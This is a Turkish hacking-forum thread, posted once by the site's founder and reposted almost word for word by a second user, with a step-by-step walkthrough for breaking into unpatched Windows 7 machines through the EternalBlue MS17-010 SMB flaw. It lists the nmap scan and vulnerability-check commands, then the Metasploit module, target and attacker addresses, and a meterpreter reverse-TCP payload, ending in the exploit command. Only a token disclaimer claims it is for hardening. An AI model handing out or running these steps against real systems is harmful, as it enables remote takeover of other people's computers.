Hack Tool metasploit ile windows 7ye sızma

cermikli

Founder
Katılım:20 Mar 2022
Mesajlar:155
Tepkime puanı:1,771
Puanları:0
Web sitesi:hacksturkey.com
Sikke
55,005
Bu makale kullanmakta olduğunuz sistemleri (Server/Client) güncel tutmanız ve security hardening yapmanız için yayınlanmıştır. esinlikle yasa dışı bir faaliyet amacıyla kullanmayınız.



Kali Linux “eternalblue” exploit’i
kullanarak güncel olmayan (eksik update’li) Windows İşletim Sistemlerine sızma testi yapacağım.

Yöntem: Wanacry MS17-010 SMB1 445/TCP

Kali IP Adres: 1.1.1.3

Windows 7 IP Adres: 1.1.1.4 (Hedef PC)



Kali Linux’te oturum açıyorum.

Hedef bilgisayarın zafiyetlerini görebilmek için NMAP tool’unu kullanacağım.

image-212.png



Nmap ile hedef bilgisayara ulaşabilirliğimi kontrol edilyorum.

Ping 1.1.1.4

image-213.png



Nmap 1.1.1.4 komutunu kullanıyorum ve hedef bilgisayarda erişebileceğim port’ları görebiliyorum.
image-214.png

445/tcp Microsoft-ds port’unu kullanacağım.

MS17-010 update’inin hedef bilgisayar da kontrolünü aşağıdaki komut ile yapıyorum.

Nmap -p445 –script smb-vuln-ms17-010 1.1.1.4
image-215.png

Komutumuzun çalışması sonucunda MS17-010 açığının olduğunu tespit ediyorum. Hedef bilgisayar da windows güncellemelerinin tam olarak yapılmadığını göryorum

Bu aşamada Vulnerability Analiz aşamasını tamamlamış oluyoruz ve Metaspolit ile Sızma Testi aşamasına geçiyoruz.

Aşağıdaki komutlar kullanılarak sızma testine devam ediyorum.

Use exploit/windows/smb/ms17_010_eternalblue

Set rhost 1.1.1.4

Set payload windows/x64/meterpreter/reverse_tcp

Set lhost 1.1.1.3



image-219.png



Show Options komutu kullanarak girilen bilgileri kontrol ediyorum.

image-220.png



Exploit yada Run komutu kullanılarak hedef sisteme sızıyoruz :)
 

Anaymous

Gold Member
Katılım:18 Nis 2022
Mesajlar:151
Tepkime puanı:696
Puanları:0
Konum: Texas
Sikke
9,772
Bu makale kullanmakta olduğunuz sistemleri (Server/Client) güncel tutmanız ve security hardening yapmanız için yayınlanmıştır. esinlikle yasa dışı bir faaliyet amacıyla kullanmayınız.



Kali Linux “eternalblue” exploit’i
kullanarak güncel olmayan (eksik update’li) Windows İşletim Sistemlerine sızma testi yapacağım.

Yöntem: Wanacry MS17-010 SMB1 445/TCP

Kali IP Adres: 1.1.1.3

Windows 7 IP Adres: 1.1.1.4 (Hedef PC)



Kali Linux’te oturum açıyorum.

Hedef bilgisayarın zafiyetlerini görebilmek için NMAP tool’unu kullanacağım.

image-212.png



Nmap ile hedef bilgisayara ulaşabilirliğimi kontrol edilyorum.

Ping 1.1.1.4

image-213.png



Nmap 1.1.1.4 komutunu kullanıyorum ve hedef bilgisayarda erişebileceğim port’ları görebiliyorum.
image-214.png

445/tcp Microsoft-ds port’unu kullanacağım.

MS17-010 update’inin hedef bilgisayar da kontrolünü aşağıdaki komut ile yapıyorum.

Nmap -p445 –script smb-vuln-ms17-010 1.1.1.4
image-215.png

Komutumuzun çalışması sonucunda MS17-010 açığının olduğunu tespit ediyorum. Hedef bilgisayar da windows güncellemelerinin tam olarak yapılmadığını göryorum

Bu aşamada Vulnerability Analiz aşamasını tamamlamış oluyoruz ve Metaspolit ile Sızma Testi aşamasına geçiyoruz.

Aşağıdaki komutlar kullanılarak sızma testine devam ediyorum.

Use exploit/windows/smb/ms17_010_eternalblue

Set rhost 1.1.1.4

Set payload windows/x64/meterpreter/reverse_tcp

Set lhost 1.1.1.3



image-219.png



Show Options komutu kullanarak girilen bilgileri kontrol ediyorum.

image-220.png



Exploit yada Run komutu kullanılarak hedef sisteme sızıyorueyw​
 

Personalize

Üst Alt
AdBlock algılandı

Anlıyoruz, reklamlar can sıkıcı!

Tabii ki, reklam engelleme yazılımı, reklamları engellemede harika bir iş çıkarır, ancak aynı zamanda web sitemizin faydalı özelliklerini de engeller. En iyi site deneyimi için lütfen AdBlocker'ınızı devre dışı bırakın.

AsBlockeri kapattım    hayır teşekkürler